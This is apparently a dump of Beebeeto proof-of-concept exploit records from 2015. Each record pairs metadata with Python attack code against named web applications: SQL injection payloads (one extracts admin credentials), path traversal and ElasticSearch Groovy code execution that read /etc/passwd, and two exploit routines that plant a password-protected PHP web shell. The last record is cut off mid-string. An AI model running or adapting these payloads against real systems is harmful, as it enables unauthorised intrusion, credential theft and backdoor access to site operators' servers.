{"create_date": "2015-03-11 10:50:30", "name": "WordPress Calculated Fields Form 1.0.10 SQL Injection POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "Ca2fux1n", "rank": 2, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "WordPress SQL\u6ce8\u5165\u6f0f\u6d1e,Calculated Fields Form,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\nimport time\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0057',\r\n 'name': 'WordPress Calculated Fields Form 1.0.10 SQL Injection POC',\r\n 'author': 'ca2fux1n',\r\n 'create_date': '2015-03-06',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['1.0.10'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['WordPress SQL\u6ce8\u5165\u6f0f\u6d1e', 'Calculated Fields Form', 'php'],\r\n 'desc': '''\r\n There are sql injection vulnerabilities in Calculated Fields Form Plugin\r\n which could allow the attacker to execute sql queries into database\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/36230/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n payloads = {'/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 and sleep(5)&name=InsertText',\r\n '/wp-admin/options-general.php?page=cp_calculated_fields_form&c=21 and sleep(5)',\r\n '/wp-admin/options-general.php?page=cp_calculated_fields_form&d=3 and sleep(5)'\r\n }\r\n for payload in payloads:\r\n verify_url += payload\r\n start_time = time.time()\r\n req = urllib2.Request(verify_url)\r\n res_content = urllib2.urlopen(req).read()\r\n if args['options']['verbose']:\r\n print '[*]Request URL ' + verify_url\r\n if time.time() - start_time > 5:\r\n args['options']['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n break\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "There are sql injection vulnerabilities in Calculated Fields Form Plugin\r\nwhich could allow the attacker to execute sql queries into database", "app_name": "WordPress", "id": "poc-2015-0057", "layer4_protocol": null}
{"create_date": "2015-03-09 21:41:25", "name": "MvMmall \u7f51\u5e97\u5546\u57ce\u7cfb\u7edf /search.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "MvMmall\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/search.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0056',\r\n 'name': 'MvMmall \u7f51\u5e97\u5546\u57ce\u7cfb\u7edf /search.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2015-03-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'MvMmall',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['MvMmall\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/search.php', 'php'],\r\n 'desc': '''\r\n mvmmall\u7f51\u5e97\u5546\u57ce\u7cfb\u7edf\u6700\u65b0\u6ce8\u51650day\u95ee\u9898\u51fa\u5728\u641c\u7d22search.php\u8fd9\u4e2a\u6587\u4ef6\u4e0a\u3002\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2011-01732',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/search.php?tag_ids[goods_id]=uid))%20and(select%201%20from\"\r\n \"(select%20count(*),concat((select%20(select%20md5(12345))%20\"\r\n \"from%20information_schema.tables%20limit%200,1),floor(rand(0)\"\r\n \"*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20\"\r\n \"and%201=1%23\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '827ccb0eea8a706c4c34a16891f84e7b' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "mvmmall\u7f51\u5e97\u5546\u57ce\u7cfb\u7edf\u6700\u65b0\u6ce8\u51650day\u95ee\u9898\u51fa\u5728\u641c\u7d22search.php\u8fd9\u4e2a\u6587\u4ef6\u4e0a\u3002", "app_name": "MvMmall", "id": "poc-2015-0056", "layer4_protocol": null}
{"create_date": "2015-03-09 14:17:52", "name": "\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf v3.0 /index.php?plugins \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf\u6f0f\u6d1e,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/index.php?plugins,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0055',\r\n 'name': '\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf v3.0 /index.php?plugins \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC',\r\n 'author': 'xiangshou',\r\n 'create_date': '2015-03-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf',\r\n 'vul_version': ['3.0'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf\u6f0f\u6d1e', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/index.php?plugins', 'php'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/index.php',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2010-033114',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/index.php?plugins&q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA=='\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'common.inc.php' in content and '$db_config' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/index.php", "app_name": "\u53a6\u95e8\u5e1d\u7f51\u4fe1\u606f\u79d1\u6280\u6709\u9650\u516c\u53f8", "id": "poc-2015-0055", "layer4_protocol": null}
{"create_date": "2015-03-08 09:54:54", "name": "\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS /data/log/passlog.php \u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS\u6f0f\u6d1e,\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,/data/log/passlog.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0054',\r\n 'name': '\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS /data/log/passlog.php \u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n 'author': '1024',\r\n 'create_date': '2015-03-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS',\r\n 'vul_version': ['*'],\r\n 'type': 'Command Execution',\r\n 'tag': ['\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS\u6f0f\u6d1e', '\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', '/data/log/passlog.php', 'php'],\r\n 'desc': '\u5382\u5546\uff1ahttp://www.90576.com/ \u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edc\u6709\u9650\u516c\u53f8',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-085633',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n # del passlog\r\n del_url = '%s/picup.php?action=del&pic=../data/log/passlog.php' % url\r\n requests.get(del_url)\r\n if args['options']['verbose']:\r\n print '[*] Request DEL_URL: ' + del_url\r\n # submit code\r\n login_url = '%s/login.php?action=login&lonadmin=1' % url\r\n login_data = {'loginuser': '<?php echo(md5(0));phpinfo();?>','loginpass':'0'}\r\n if args['options']['verbose']:\r\n print '[*] Submit code: ' + login_url\r\n print '[*] Code content: ' + login_data['loginuser']\r\n requests.post(login_url, data=login_data)\r\n # return page\r\n verify_url = '%s/data/log/passlog.php' % url\r\n content = requests.get(verify_url).content\r\n if 'cfcd208495d565ef66e7dff9f98764da' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n url = args['options']['target']\r\n # del passlog\r\n del_url = '%s/picup.php?action=del&pic=../data/log/passlog.php' % url\r\n requests.get(del_url)\r\n if args['options']['verbose']:\r\n print '[*] Request DEL_URL: ' + del_url\r\n # submit code\r\n login_url = '%s/login.php?action=login&lonadmin=1' % url\r\n login_data = {'loginuser': '<?php echo(md5(0));eval($_POST[bb2]);?>','loginpass':'0'}\r\n if args['options']['verbose']:\r\n print '[*] Submit code: ' + login_url\r\n print '[*] Code content: ' + login_data['loginuser']\r\n requests.post(login_url, data=login_data)\r\n # return page\r\n webshell = '%s/data/log/passlog.php' % url\r\n content = requests.get(webshell).content\r\n if 'cfcd208495d565ef66e7dff9f98764da' in content:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = webshell\r\n args['poc_ret']['password'] = 'bb2'\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u5382\u5546\uff1ahttp://www.90576.com/ \u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edc\u6709\u9650\u516c\u53f8", "app_name": "Other", "id": "poc-2015-0054", "layer4_protocol": null}
{"create_date": "2015-03-07 23:20:06", "name": "\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS /index.php \u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS\u6f0f\u6d1e,\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0053',\r\n 'name': '\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS /index.php \u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n 'author': '1024',\r\n 'create_date': '2015-03-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS',\r\n 'vul_version': ['*'],\r\n 'type': 'Command Execution',\r\n 'tag': ['\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS\u6f0f\u6d1e', '\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', '/index.php', 'php'],\r\n 'desc': '\u5382\u5546\uff1ahttp://www.90576.com/ \u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edc\u6709\u9650\u516c\u53f8',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-083077',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/index.php?col=13&mod=web&q=%24{%40phpinfo()}'\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(verify_url).read()\r\n if '<title>phpinfo()</title>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n payload = '/index.php?col=13&mod=web&q=%24{%40eval($_POST[bb2])}%24{%40print(md5(123))}'\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(verify_url).read()\r\n if '202cb962ac59075b964b07152d234b70' in content:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = verify_url\r\n args['poc_ret']['password'] = 'bb2'\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u5382\u5546\uff1ahttp://www.90576.com/ \u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edc\u6709\u9650\u516c\u53f8", "app_name": "Other", "id": "poc-2015-0053", "layer4_protocol": null}
{"create_date": "2015-03-06 11:03:08", "name": "\u6700\u571f\u56e2\u8d2d /ajax/coupon.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u6700\u571f\u56e2\u8d2d\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/ajax/coupon.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0051',\r\n 'name': '\u6700\u571f\u56e2\u8d2d /ajax/coupon.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'xiangshou',\r\n 'create_date': '2015-03-06',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u6700\u571f\u56e2\u8d2d',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u6700\u571f\u56e2\u8d2d\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/ajax/coupon.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': [\r\n 'http://wooyun.org/bugs/wooyun-2014-075525',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/\"\r\n \"**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,\"\r\n \"password,0x3a,email,md5(233)),8,9,10,11,9999999999,13,14,15,16/**/from/\"\r\n \"**/user/**/where/**/manager=0x59/**/limit/**/0,1%23\")\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n if 'e165421110ba03099a1c0393373c5b43' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "\u6700\u571f\u56e2\u8d2d", "id": "poc-2015-0051", "layer4_protocol": null}
{"create_date": "2015-03-05 12:59:13", "name": "ElasticSearch Groovy\u811a\u672c\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2015-1427\uff09POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "\u96f7\u950b", "rank": 5, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "Elasticsearch\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,Elasticsearch,JAVA,CVE-2015-1427", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport json\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0048',\r\n 'name': 'ElasticSearch Groovy\u811a\u672c\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2015-1427\uff09POC',\r\n 'author': '\u96f7\u950b',\r\n 'create_date': '2015-03-04',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [9200],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Elasticsearch',\r\n 'vul_version': ['*'],\r\n 'type': 'Code Execution',\r\n 'tag': ['Elasticsearch\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', 'Elasticsearch', 'JAVA', 'CVE-2015-1427'],\r\n 'desc': '''\r\n ElasticSearch\u662f\u4e00\u4e2aJAVA\u5f00\u53d1\u7684\u641c\u7d22\u5206\u6790\u5f15\u64ce\u30022014\u5e74\uff0c\u66fe\u7ecf\u88ab\u66dd\u51fa\u8fc7\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2014-3120\uff09\uff0c\r\n \u6f0f\u6d1e\u51fa\u73b0\u5728\u811a\u672c\u67e5\u8be2\u6a21\u5757\uff0c\u7531\u4e8e\u641c\u7d22\u5f15\u64ce\u652f\u6301\u4f7f\u7528\u811a\u672c\u4ee3\u7801\uff08MVEL\uff09\uff0c\u4f5c\u4e3a\u8868\u8fbe\u5f0f\u8fdb\u884c\u6570\u636e\u64cd\u4f5c\uff0c\r\n \u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7MVEL\u6784\u9020\u6267\u884c\u4efb\u610fjava\u4ee3\u7801\uff0c\u540e\u6765\u811a\u672c\u8bed\u8a00\u5f15\u64ce\u6362\u6210\u4e86Groovy\uff0c\r\n \u5e76\u4e14\u52a0\u5165\u4e86\u6c99\u76d2\u8fdb\u884c\u63a7\u5236\uff0c\u5371\u9669\u7684\u4ee3\u7801\u4f1a\u88ab\u62e6\u622a\uff0c\u7ed3\u679c\u8fd9\u6b21\u7531\u4e8e\u6c99\u76d2\u9650\u5236\u7684\u4e0d\u4e25\u683c\uff0c\u5bfc\u81f4\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002\r\n ''',\r\n 'references': [\r\n 'http://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==&mid=202983721&idx=1&sn=bde079dcee38c4c655e920cbcc78c6e8&scene=0',\r\n 'http://zone.wooyun.org/content/18915',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/_search?pretty'\r\n cs = {\r\n 'size':'1',\r\n 'script_fields':\r\n {'iswin':\r\n {'script':\r\n 'java.lang.Math.class.forName(\\\"java.io.BufferedReader\\\").\\\r\n getConstructor(java.io.Reader.class).newInstance(java.lang.\\\r\n Math.class.forName(\\\"java.io.InputStreamReader\\\").getConstructor\\\r\n (java.io.InputStream.class).newInstance(java.lang.Math.class.forName\\\r\n (\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()))\\\r\n .readLines()','lang':'groovy'\r\n }\r\n }\r\n }\r\n jdata = json.dumps(cs)\r\n req = urllib2.urlopen(verify_url, jdata)\r\n content = req.read()\r\n if 'root:' in content and 'nobody:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "ElasticSearch\u662f\u4e00\u4e2aJAVA\u5f00\u53d1\u7684\u641c\u7d22\u5206\u6790\u5f15\u64ce\u30022014\u5e74\uff0c\u66fe\u7ecf\u88ab\u66dd\u51fa\u8fc7\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2014-3120\uff09\uff0c\r\n\u6f0f\u6d1e\u51fa\u73b0\u5728\u811a\u672c\u67e5\u8be2\u6a21\u5757\uff0c\u7531\u4e8e\u641c\u7d22\u5f15\u64ce\u652f\u6301\u4f7f\u7528\u811a\u672c\u4ee3\u7801\uff08MVEL\uff09\uff0c\u4f5c\u4e3a\u8868\u8fbe\u5f0f\u8fdb\u884c\u6570\u636e\u64cd\u4f5c\uff0c\r\n\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7MVEL\u6784\u9020\u6267\u884c\u4efb\u610fjava\u4ee3\u7801\uff0c\u540e\u6765\u811a\u672c\u8bed\u8a00\u5f15\u64ce\u6362\u6210\u4e86Groovy\uff0c\r\n\u5e76\u4e14\u52a0\u5165\u4e86\u6c99\u76d2\u8fdb\u884c\u63a7\u5236\uff0c\u5371\u9669\u7684\u4ee3\u7801\u4f1a\u88ab\u62e6\u622a\uff0c\u7ed3\u679c\u8fd9\u6b21\u7531\u4e8e\u6c99\u76d2\u9650\u5236\u7684\u4e0d\u4e25\u683c\uff0c\u5bfc\u81f4\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002", "app_name": "ElasticSearch", "id": "poc-2015-0048", "layer4_protocol": null}
{"create_date": "2015-03-04 17:42:58", "name": "WebServer\u5904\u7406URL\u4e0d\u5f53\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "tmp", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6", "tag": "Django\u6f0f\u6d1e,Tornado\u6f0f\u6d1e,Web.py\u6f0f\u6d1e,python\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0047',\r\n 'name': 'WebServer\u5904\u7406URL\u4e0d\u5f53\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-03-04',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Other',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Read',\r\n 'tag': ['Django\u6f0f\u6d1e', 'Tornado\u6f0f\u6d1e', 'Web.py\u6f0f\u6d1e', 'python\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e'],\r\n 'desc': 'N/A',\r\n 'references': [\r\n 'http://www.lijiejie.com/python-django-directory-traversal/',\r\n 'http://drops.wooyun.org/papers/5040',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/../../../../../../../../../etc/passwd'\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: %s' % verify_url\r\n content = requests.get(verify_url).content\r\n if 'root:' in content and 'nobody:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2015-0047", "layer4_protocol": null}
{"create_date": "2015-03-04 10:39:02", "name": "PHPMoAdmin /moadmin.php \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e (0-Day) POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 5, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "PHPMoAdmin\u6f0f\u6d1e,PHPMoAdmin\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c,/moadmin.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0044',\r\n 'name': 'PHPMoAdmin /moadmin.php 